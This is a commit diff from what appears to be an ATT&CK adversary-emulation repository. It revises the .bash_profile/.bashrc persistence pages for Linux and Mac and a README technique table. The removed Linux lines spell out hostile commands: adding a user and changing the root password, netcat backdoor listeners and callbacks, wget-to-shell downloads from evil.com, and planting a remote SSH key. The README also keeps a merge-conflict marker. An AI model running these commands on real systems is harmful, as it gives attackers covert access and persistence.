Fixing .bash_profile

* Removed commands not related to this technique, and replaced them
with legitimate ones.
* Added .bash_profile page to Mac

Linux/Persistence/bash_profile_and_bashrc.md

@@ -2,19 +2,5 @@
 
 MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
 
-* Adding an unauthorized user (useradd)
+    echo "/path/to/script.py" >> ~/.bash_profile
-  * `useradd test && echo test:testpass | chpasswd`
+    echo "/path/to/script.py" >> ~/.bashrc
-* Changing the password to an existing user (noisy, passwd)
-  * `echo root:NoLogon | chpasswd` (use nologon as pass word for a tiny bit of obscurity)
-* Create a backdoor listener (netcat)
-  * `nc –nlp 8080`
-* Create a backdoor callback (netcat)
-  * `nc 192.168.0.1 8080`
-* Retrieve commands from a C2 server (wget or curl)
-  * `wget https://evil.com/more/commands.txt | /bin/sh`
-* Download additional tools and execute (wget or curl)
-  * `wget https://evil.com/bad/executeable | /bin/sh`
-* Add key to authorized_keys file (paste or get from remote server)
-  * `echo $(wget https://evil.com/bad/ssh/key.txt) >> ~/.ssh/authotized_keys`
-* Set an alias to do additional tasks
-  * `alias ls='ls –al & <any command from above>'`

Mac/Persistence/bash_profile_and_bashrc.md

@@ -0,0 +1,6 @@
+# .bash_profile and .bashrc
+
+MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156)
+
+    echo "/path/to/script.py" >> ~/.bash_profile
+    echo "/path/to/script.py" >> ~/.bashrc

Mac/README.md

@@ -3,7 +3,7 @@
 
 | Persistence                  | Privilege Escalation          | Defense Evasion               | Credential Access                      | Discovery                              | Lateral Movement                | Execution                | Collection                     | Exfiltration                                  | Command and Control                     |
 |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------|
-| .bash_profile and .bashrc    | Dylib Hijacking               | Binary Padding                | [Bash History](Credential_Access/Bash_History.md)                           | [Account Discovery](Discovery/Account_Discovery.md )                      | [AppleScript](Execution/AppleScript.md)                     | [AppleScript](Execution/AppleScript.md)              | Automated Collection           | Automated Exfiltration                        | Commonly Used Port                      |
+| [].bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md)    | Dylib Hijacking               | Binary Padding                | [Bash History](Credential_Access/Bash_History.md)                           | [Account Discovery](Discovery/Account_Discovery.md )                      | [AppleScript](Execution/AppleScript.md)                     | [AppleScript](Execution/AppleScript.md)              | Automated Collection           | Automated Exfiltration                        | Commonly Used Port                      |
 | [Cron Job](Persistence/Cron_Job.md)                     | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md)         | Brute Force                            | Application Window Discovery           | Application Deployment Software | Command-Line Interface   | Clipboard Data                 | Data Compressed                               | Communication Through Removable Media   |
 <<<<<<< HEAD
 | Dylib Hijacking              | Launch Daemon                 | Code Signing                  | Create Account                         | File and Directory Discovery           | Exploitation of Vulnerability   | Graphical User Interface | Data Staged                    | Data Encrypted                                | Connection Proxy                        |